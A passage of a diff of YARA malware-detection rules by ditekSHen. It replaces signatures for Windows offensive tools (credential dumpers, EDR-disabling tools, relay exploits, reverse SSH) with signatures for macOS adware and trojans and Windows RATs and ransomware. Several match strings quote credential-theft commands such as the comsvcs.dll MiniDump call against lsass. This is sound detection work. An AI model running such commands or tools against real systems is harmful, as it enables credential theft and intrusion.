-		$x1 = "PPLBlade" ascii
-		$x2 = "/PPLBlade/" ascii
-		$x3 = "PPLBlade.exe --mode" ascii
-		$x4 = "PPLBLADE.SYSPPLBlade.dmp" ascii
-		$s1 = "Dump bytes sent at %s:%d. Protocol: %s" ascii
-		$s2 = "Deobfuscated dump saved in file %s" ascii
-		$m1 = "main.WriteDriverOnDisk" ascii
-		$m2 = "main.ProcExpOpenProc" ascii
-		$m3 = "main.miniDumpCallback" ascii
-		$m4 = "main.copyDumpBytes" ascii
-		$m5 = "main.MiniDumpGetBytes" ascii
-		$m6 = "main.SendBytesRaw" ascii
-		$m7 = "main.SendBytesSMB" ascii
-		$m8 = "main.DeobfuscateDump" ascii
-		$m9 = "main.dumpMutex" ascii
-		$m10 = "main.dbghelpDLL" ascii
-		$m11 = "main.miniDumpWriteDump" ascii
+		$s1 = "\\Update\\Tmp\\" wide
+		$s2 = "*pass*.*" fullword wide
+		$s3 = ">> NUL" wide
+		$s4 = "%02d.%02d.%04d %02d:%02d" wide
+		$s5 = "/c del" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and ( 1 of ( $s* ) or 3 of ( $m* ) ) ) or ( all of ( $s* ) and 3 of ( $m* ) ) or ( 7 of ( $m* ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpldap : FILE
+rule DITEKSHEN_MALWARE_Osx_Macsearch : FILE
 {
 	meta:
-		description = "Detects SharpLDAP tool written in C# that aims to do enumeration via LDAP queries"
+		description = "Detects MacSearch adware"
 		author = "ditekSHen"
-		id = "597e578d-41f0-595e-b92c-0c3676d8b47a"
+		id = "facdf05c-5ee4-54c6-9ca3-01978af2b6e6"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1660-L1675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3071-L3092"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da5db3f2907229dc68e3c6f3351361a4b1fb9fe8afc597c9dfe611f9725c6181"
+		logic_hash = "973b7215fc8d04685a46d05b53b4092e7b81ed0d64d6982b534f2b89d0a59443"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$x1 = "SharpLDAP" ascii wide
-		$x2 = "SharpLDAP.pdb" ascii
-		$s1 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" wide
-		$s2 = "(&(servicePrincipalName=*))" wide
-		$s3 = "/Enumerating (Domain|Enterprise|Organizational|Service|Members|Users|Computers)/" wide
-		$s4 = "ListMembers" fullword ascii
-		$s5 = "GroupMembers" fullword ascii
-		$s6 = "get_SamAccountName" fullword ascii
+		$s1 = "open -a safari" ascii
+		$s2 = "/INDownloader" ascii
+		$s3 = "/safefinder" ascii
+		$s4 = "/INEncryptor" ascii
+		$s5 = "/INInstallerFlow" ascii
+		$s6 = "/INConfiguration" ascii
+		$s7 = "/INChromeAndFFSetter" ascii
+		$s8 = "/INSafariSetter" ascii
+		$s9 = "/bin/launchctl" fullword ascii
+		$s10 = "/usr/bin/csrutil" fullword ascii
+		$s11 = "_Tt%cSs%zu%.*s%s" fullword ascii
+		$s12 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
+		$s13 = "/macap/safefinder_Obf/safefinder/" ascii
+		$s14 = "/safefinder.build/Release/macsearch.build/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) ) )
+		uint16( 0 ) == 0xfacf and 10 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Pandora : FILE
+rule DITEKSHEN_MALWARE_Osx_Genieo : FILE
 {
 	meta:
-		description = "Detects Pandora tool to extract credentials from password managers"
+		description = "Detects LinqurySearch/Genieo adware"
 		author = "ditekSHen"
-		id = "3f71f24b-755f-5967-afbf-04a512bd0a19"
+		id = "ac44eefd-bf1c-5d4b-bcd4-9a5d394ac1d3"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1677-L1691"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3094-L3112"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd5be3b99b62ec40c242225d9420b9ce299c4f348882b0380289309dfedbc1e8"
+		logic_hash = "951dc8539435a52d9eea00b3fdaf98cf618c03867066819f2f9244165e57c675"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Osx.Trojan.Genieo"
 
 	strings:
-		$s1 = "process PID:" fullword wide
-		$s2 = "Dump file created:" fullword wide
-		$s3 = "System.Security.AccessControl.FileSystemAccessRule('Everyone', 'FullControl', 'Allow')" ascii
-		$s4 = "{[math]::Round($_.PrivateMemorySize64" ascii
-		$s5 = "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $" ascii
-		$s6 = "\"payload\":{\"logins\":" ascii
-		$s7 = "\\pandora.pdb" ascii
+		$s1 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
+		$s2 = "U1QQFXAfCxAfRUNCH1JZXh9" ascii
+		$s3 = "XVFTQ1VRQlNYH" ascii
+		$s4 = "dF9HXlxfUVQQVUJCX0IQHRB" ascii
+		$s5 = "Value:forHTTPHeaderField:" ascii
+		$s6 = "postContent:::" fullword ascii
+		$s7 = "postLog:" fullword ascii
+		$s8 = "initWithBase64EncodedString:options:" fullword ascii
+		$s9 = "do shell script \"%@\" with administrator privileges" fullword ascii
+		$s10 = /LinqurySearch-[a-f0-9]{40,}/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0xfacf and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_TOOL_Havoc : FILE
+rule DITEKSHEN_MALWARE_Osx_AMCPCVARK : FILE
 {
 	meta:
-		description = "Detects Havoc Demon"
+		description = "Detects OSX TechyUtils/PCVARK adware"
 		author = "ditekSHen"
-		id = "71ad145c-4017-597a-837e-5d11ba64d7c0"
+		id = "1378364b-db10-5194-98f8-5347504a92e6"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1693-L1710"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3114-L3139"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5806deaa57590ebe1923608b9b085460e0edd024721e6e9d7073765a79bf22b"
+		logic_hash = "b18a9f578af98feb5107d9ef85850457ba5921ab58af7b097a815e3af74f05f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Osx.Adware.AMC-PCVARK-TechyUtils"
 
 	strings:
-		$x1 = "X-Havoc:" wide
-		$x2 = "X-Havoc-Agent:" wide
-		$s1 = "\\Werfault.exe" wide
-		$s2 = "/funny_cat.gif" wide
+		$s1 = "Mac Auto Fixer.app" fullword ascii
+		$s2 = "com.techyutil.macautofixer" fullword ascii
+		$s3 = "com.findApp.findApp" ascii
+		$s4 = "Library/Preferences/%@.plist" fullword ascii
+		$s5 = "Library/%@/%@" fullword ascii
+		$s6 = "Library/Application Support/%@/%@" fullword ascii
+		$s7 = "sleep 3; rm -rf \"%@\"" fullword ascii
+		$s8 = "Silently calling url: %@" ascii
+		$cnc1 = "cloudfront.net/getdetails" ascii
+		$cnc2 = "trk.entiretrack.com/trackerwcfsrv/tracker.svc/trackOffersAccepted/?" ascii
+		$cnc3 = "pxl=%@&x-count=1&utm_source=%@&lpid=0&utm_content=&utm_term=&x-base=&utm_medium=%@&utm_publisher=%@&offerpxl=&x-fetch=1&utm_campaign=@&affiliateid=&x-at=&btnid=" ascii
+		$x1 = "mafsysinfo" fullword ascii
+		$x2 = "MAF4497_MAF4399_MAF2204" ascii
+		$developerid = "Developer ID Application: Rahul Gahlot (RZ74UYT742)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 3 of them or ( pe.number_of_imports == 0 and pe.number_of_exports == 0 and 2 of them ) )
+		uint16( 0 ) == 0xfacf and ( 6 of ( $s* ) or 2 of ( $cnc* ) or all of ( $x* ) or $developerid )
 }
-rule DITEKSHEN_INDICATOR_TOOLS_Localpotato : FILE
+rule DITEKSHEN_MALWARE_Osx_Realtimespy : FILE
 {
 	meta:
-		description = "Detects LocalPotato"
-		author = "ditekShen"
-		id = "65f8305b-b830-58e7-970b-da1df9a06e9b"
+		description = "Detects macOS RealtimeSpy monitoring app"
+		author = "ditekSHen"
+		id = "6485abf3-896c-54cd-ad84-7bd86456e47b"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1712-L1743"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3141-L3166"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "88fba16a6eec6d2c23331642041c6adfddddeb21ba8e74b6959bd48c90f73cbb"
+		logic_hash = "4ef2e1b8d34962cd3eab23f401b764b38b8332233aa2ae91b218af499d8ab8ff"
 		score = 75
-		quality = 73
+		quality = 57
 		tags = "FILE"
+		clamav_sig = "MALWARE.Osx.Trojan.RealtimeSpy"
 
 	strings:
-		$x1 = "LocalPotato.stg" fullword wide
-		$x2 = "we always love potatoes" fullword ascii
-		$s1 = "{00000306-0000-0000-c000-000000000046}" wide
-		$s2 = "{854A20FB-2D44-457D-992F-EF13785D2B51}" wide
-		$s3 = "cifs/127.0.0.1" wide
-		$s4 = "\\\\127.0.0.1\\c$" wide
-		$s5 = "complete failed: 0x%08x" ascii
-		$s6 = "Authorization: NTLM %s" ascii
-		$s7 = "Objref Moniker Display Name = %S" ascii
-		$s8 = "SMB Connect Tree: %S" ascii
-		$s9 = "b64type=%s" fullword ascii
-		$s10 = "decodes=%s" fullword ascii
-		$s11 = { 53 4d 42 72 00 00 00 00 18 01 48 00 00 00 00 00
-               00 00 00 00 00 00 00 ff ff ac 7b 00 00 00 00 00
-               22 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 02 53
-               4d 42 20 32 2e 30 30 32 00 02 53 4d 42 20 32 2e
-               3f 3f 3f 00 00 00 00 00 00 00 00 00 00 00 68 fe
-               53 4d 42 40 }
-		$o1 = { 44 8b 4c 24 34 48 8d 44 24 38 48 89 44 24 28 4c }
-		$o2 = { e8 c4 ff ff ff 33 d2 48 8d 4d f0 41 b8 d0 04 00 }
-		$o3 = { 83 7b 0c 00 75 42 8b 03 25 ff ff ff 1f 3d 21 05 }
-		$o4 = { 3c 68 74 6c 3c 6a 74 5c 3c 6c 74 34 3c 74 74 24 }
-		$o5 = { e9 39 ff ff ff cc 48 89 5c 24 08 4c 89 4c 24 20 }
-		$o6 = { 48 b9 ff ff ff ff ff ff 0f 00 48 8b c2 41 b8 0c }
+		$x1 = "SPYAGENT4HASHCIPHER" fullword ascii
+		$x2 = ":username:password:acctid:compUser:compName:" ascii
+		$x3 = ":username:password:acctid:compName:" ascii
+		$x4 = "://www.realtime-spy-mac.com/" ascii
+		$x5 = "/Users/spytech/" ascii
+		$x6 = "shell script \"touch /private/var/db/.AccessibilityAPIEnabled\" password \"pwd\" with administrator privileges" ascii
+		$x7 = "Content-Disposition: form-data; name=\"raptor_" ascii
+		$c1 = "_OBJC_CLASS_$_LocationLogger" fullword ascii
+		$c2 = "_OBJC_CLASS_$_MonitoringFunctions" fullword ascii
+		$c3 = "_OBJC_CLASS_$_ProcessLogger" fullword ascii
+		$c4 = "_OBJC_CLASS_$_RealtimeLoggingFunctions" fullword ascii
+		$c5 = "_OBJC_CLASS_$_Realtime_SpyAppDelegate" fullword ascii
+		$c6 = "_OBJC_CLASS_$_ScreenshotLogger" fullword ascii
+		$c7 = "_OBJC_CLASS_$_Uploader" fullword ascii
+		$c8 = "_OBJC_CLASS_$_UsageLogger" fullword ascii
+		$c9 = "_OBJC_CLASS_$_WebsiteLogger" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or 8 of ( $s* ) or ( 4 of ( $o* ) and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) )
+		uint16( 0 ) == 0xfacf and ( 2 of ( $x* ) or 2 of ( $c* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOLS_Edrsandblast : FILE
+rule DITEKSHEN_MALWARE_Osx_Maxofferdeal : FILE
 {
 	meta:
-		description = "Detects EDRSandBlast"
-		author = "ditekShen"
-		id = "85d6d82b-a30e-5c79-93e7-8a3bbbf4a403"
+		description = "Detects macOS MaxOfferDeal adware"
+		author = "ditekSHen"
+		id = "aec4ab77-7025-5856-99fb-aa7b86413c00"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1745-L1767"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3168-L3187"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b801f053e42fbd646cf62fecf6cbf5f2cceeec82bed93ecd8625984eccb08c6"
+		logic_hash = "a9788b2049ae7f345760a078b2932e79fe8fc0dd71e0446c213df64480c3e3d6"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
+		clamav_sig = "MALWARE.Osx.Adware.MaxOfferDeal"
 
 	strings:
-		$s1 = "credguard" fullword wide
-		$s2 = "\\cmd.exe" fullword wide
-		$s3 = "ci_%s.dll" fullword wide
-		$s4 = "cmd /c sc" wide
-		$s5 = "fltmgr_%s.sys" fullword wide
-		$s6 = "ntoskrnl_%s.exe" fullword wide
-		$s7 = "ProductDir" fullword wide
-		$s8 = "lsass.exe" fullword wide
-		$s9 = "0x%p;%ws;%ws;;;" ascii
-		$s10 = "MiniDumpWriteDump" ascii
-		$s11 = "EDRSB_Init: %u" ascii
-		$s12 = "ntoskrnloffsets.csv" fullword wide nocase
-		$s13 = "wdigestoffsets.csv" fullword wide nocase
-		$o1 = { eb 0e 8b 85 34 15 00 00 ff c0 89 85 34 15 00 00 }
-		$o2 = { 74 48 8b 85 34 15 00 00 41 b9 04 01 00 00 4c 8d }
+		$s1 = "clEvE15obfuscated_data" ascii
+		$s2 = "%.*s.%.*s" fullword ascii
+		$s3 = "_Tt%cSs%zu%.*s%s" fullword ascii
+		$s4 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
+		$s5 = "__ZL20tFirefoxProfilesPath" ascii
+		$s6 = "__ZL22tFirefoxSearchFileName" ascii
+		$s7 = "__ZL37tFirefoxDefaultProfileFolderExtension" ascii
+		$s8 = "__ZL21tFirefoxPrefsFileName" ascii
+		$s9 = "__GLOBAL__sub_I_Firefox.mm" ascii
+		$s10 = "add_image_hook_" ascii
+		$s11 = "/Library/Caches/com.apple.xbs/Sources/arclite/arclite-66/source/" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0xfacf and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOLS_Rsockstun : FILE
+rule DITEKSHEN_MALWARE_Osx_Windtrail : FILE
 {
 	meta:
-		description = "Detects rsockstun"
-		author = "ditekShen"
-		id = "a284a607-abea-5914-ad3a-84eaff733ee0"
+		description = "Detects WindTrail OSX trojan"
+		author = "ditekSHen"
+		id = "abf7cd20-b37d-5d0a-8f3f-f4e491965713"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1769-L1781"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3189-L3206"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ad0ac389bf8961b0dd987a72d5dd534e5e3cc673f0e07aa49d39d1fd3f5f53e"
+		logic_hash = "291f919cb1e8c4b33960dd3f2c842b9efec04852bd5661543e3ee60bc0fc5ba6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Osx.Trojan.WindTrail"
 
 	strings:
-		$s1 = "main.connectviaproxy" ascii
-		$s2 = "main.connectForSocks" ascii
-		$s3 = "main.listenForClients" ascii
-		$s4 = "main.listenForSocks" ascii
-		$s5 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
+		$s1 = "m_ComputerName_UserName" fullword ascii
+		$s2 = "m_uploadURL" fullword ascii
+		$s3 = "m_logString" fullword ascii
+		$s4 = "GenrateDeviceName" fullword ascii
+		$s5 = "open -a" fullword ascii
+		$s6 = "AESEncryptFile:toFile:usingPassphrase:error:" fullword ascii
+		$s7 = "scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:" fullword ascii
+		$s8 = "_kLSSharedFileListSessionLoginItems" fullword ascii
+		$developerid = "Developer ID Application: warren portman (95RKE2AA8F)" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them
+		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Scmaldevinj_Go : FILE
+rule DITEKSHEN_MALWARE_Osx_Techyutils : FILE
 {
 	meta:
-		description = "Detects Go shell/malware dev injector"
-		author = "ditekShen"
-		id = "56ec114f-8e16-5ab6-ae3b-a182cb381b4a"
+		description = "Detects TechyUtils OSX packages"
+		author = "ditekSHen"
+		id = "59fd4165-987f-5b68-9341-d78184b25a1c"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1783-L1793"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3208-L3224"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48c3c759283c63a0c439cfba0194da89f402189e4c3cd831c22b5078ccae47b1"
+		logic_hash = "071c67cace09dd66233bd4c4dd78c32d0f39f7e38dc06ec62e09fef67762d098"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Osx.Trojan.TechyUtils"
 
 	strings:
-		$s1 = "hooka/shellcode.go" ascii
-		$s2 = "/maldev\x09v" ascii
-		$s3 = "Binject/debug/pe." ascii
+		$s1 = "__ZL58__arclite_NSMutableDictionary__" ascii
+		$s2 = "__ZL46__arclite_NSDictionary_" ascii
+		$s3 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
+		$s4 = "/productprice.svc/GetCountryCode" ascii
+		$s5 = "@_pthread_mutex_lock" fullword ascii
+		$s6 = "_mh_execute_header" fullword ascii
+		$s7 = "/Users/prasoon/Documents/" ascii
+		$developerid = "Developer ID Application: Techyutils Software Private Limited (VS9Q8BRRRJ)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Reversessh_Go : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent04 : FILE
 {
 	meta:
-		description = "Detects golang reverse ssh tool"
-		author = "ditekShen"
-		id = "4fb671aa-ad42-5f7e-bd5a-c19f018088c9"
+		description = "Detects known downloader agent downloading encoded binaries in patches from paste-like websites, most notably hastebin"
+		author = "ditekSHen"
+		id = "d591c591-aecc-557e-85b4-1e2589fbfbf9"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1795-L1804"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3247-L3263"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f9899aacc09c7da05fb5d412cfe8e91ee0d8e922189a6f921410d73ae8b3a9c"
+		logic_hash = "73e6af7c32d38ec5d1d2bc9f2517860367b46779b53e0faff8885b655561ab01"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent04"
 
 	strings:
-		$s1 = "/reverse_ssh/" ascii
-		$s2 = "main.rsshService" ascii
+		$x1 = "@@@http" ascii wide
+		$s1 = "HttpWebRequest" fullword ascii
+		$s2 = "GetResponseStream" fullword ascii
+		$s3 = "set_FileName" fullword ascii
+		$s4 = "set_UseShellExecute" fullword ascii
+		$s5 = "WebClient" fullword ascii
+		$s6 = "set_CreateNoWindow" fullword ascii
+		$s7 = "DownloadString" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and #x1 > 1 and 4 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpghosttask : FILE
+rule DITEKSHEN_MALWARE_Win_Gdriverat : FILE
 {
 	meta:
-		description = "Detects SharpGhostTask"
+		description = "Detects GDriveRAT"
 		author = "ditekSHen"
-		id = "84d71179-0cfd-5389-b6bd-92c292361b3c"
+		id = "29e46280-39d1-5d49-ab0d-0a32398b30f0"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1806-L1817"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3265-L3284"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3de8d9fe7804e208ff556b6bedbd80eebfda1a730626403418a555ad9fbbb820"
+		logic_hash = "134e66d0afc90e7fbab2c9dd034f85eb504903481e12c1ab8d7bab9321da817a"
 		score = 75
 		quality = 50
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.GDriveRAT"
 
 	strings:
-		$x1 = "Ghosted" wide
-		$x2 = /--target(binary|task)/ fullword wide
-		$x3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\T" wide nocase
-		$s4 = "__GhostTask|" ascii
+		$h1 = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart" fullword wide
+		$h2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword wide
+		$h3 = "multipart/related; boundary=\"boundary_tag\"" fullword wide
+		$h4 = "https://www.googleapis.com/drive/v3/files" fullword wide
+		$s1 = "move gdrive.exe \"C:\\Users\\" fullword wide
+		$s2 = "file_data" fullword ascii
+		$s3 = "comp_id" fullword ascii
+		$s4 = "file_name" fullword ascii
+		$s5 = "refresh_token" fullword ascii
+		$s6 = "commands" fullword ascii
+		$s7 = "execute" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and 3 of ( $h* ) and 5 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Krbrelay : FILE
+rule DITEKSHEN_MALWARE_Win_STOP : FILE
 {
 	meta:
-		description = "Detects KrbRelay"
-		author = "ditekshen"
-		id = "c8baac8a-54f3-5f53-93f8-daabeaaaff44"
+		description = "Detects STOP ransomware"
+		author = "ditekSHen"
+		id = "e928d917-a9d9-5830-938a-59b62608e84c"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1819-L1836"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3286-L3309"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f76b585cd2d741eab9d91ffd5a34c38696ac573cba1a3752d21c4b8b6681ad7b"
+		logic_hash = "61f7e7c1139c56088b2f58b78ae132ffcfef0f931c15b67ea775b0d5e51d189d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		snort2_sid = "920113"
+		snort3_sid = "920111"
+		clamav_sig = "MALWARE.Win.Ransomware.STOP"
 
 	strings:
-		$s1 = "System.Collections.Generic.IEnumerable<System.IntPtr>.GetEnumerator" fullword ascii
-		$s2 = "System.Collections.Generic.IEnumerator<System.IntPtr>.get_Current" fullword ascii
-		$s3 = "GetProcessIdFromIPid" fullword ascii
-		$g1 = "hello.stg" fullword wide
-		$g2 = "DSInternals.Common" fullword ascii
-		$g3 = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_7b3eed059f4c3e41\\Amd64\\UNIDRV.DLL" fullword wide
-		$g4 = "C:\\Windows\\System32\\kernelbase.dll" fullword wide
-		$g5 = "get_UnsupportedSecretEncryptionType" fullword ascii
-		$g6 = "CoInitializeSecurity Error: 0x{0:X8}. Exploit will fail." fullword wide
-		$g7 = "AuthnSvc: {0} - PrincName: {1}" fullword wide
+		$x1 = "C:\\SystemID\\PersonalID.txt" fullword wide
+		$x2 = "/deny *S-1-1-0:(OI)(CI)(DE,DC)" wide
+		$x3 = "e:\\doc\\my work (c++)\\_git\\encryption\\" ascii wide nocase
+		$s1 = "\" --AutoStart" fullword ascii wide
+		$s2 = "--ForNetRes" fullword wide
+		$s3 = "--Admin" fullword wide
+		$s4 = "%username%" fullword wide
+		$s5 = "?pid=" fullword wide
+		$s6 = /&first=(true|false)/ fullword wide
+		$s7 = "delself.bat" ascii
+		$mutex1 = "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}" fullword ascii
+		$mutex2 = "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}" fullword ascii
+		$mutex3 = "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 4 of ( $g* ) ) or ( 7 of them ) )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $mutex* ) ) or ( all of ( $x* ) ) or ( 6 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $mutex* ) ) ) or ( 9 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Edrsilencer : FILE
+rule DITEKSHEN_MALWARE_Win_Parallaxrat : FILE
 {
 	meta:
-		description = "Detects EDRSilencer"
-		author = "ditekshen"
-		id = "29b6da1e-9138-5ee6-b9fd-d7b3c7f48626"
+		description = "Detects ParallaxRAT"
+		author = "ditekSHen"
+		id = "e602b28f-ae5d-52af-b1c5-5c41776dd4c5"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1838-L1857"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3311-L3328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da00aced2608fd5e192397ef2346ac247f29f993995fb90189e05da60be15d13"
+		logic_hash = "7fd94dee44079b595b906f1687f44b51b8cebabbeb0900563b8d4fcc0e46bdd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.ParallaxRAT"
 
 	strings:
-		$s1 = "block \"C:\\Windows\\System32\\curl.exe\"" ascii
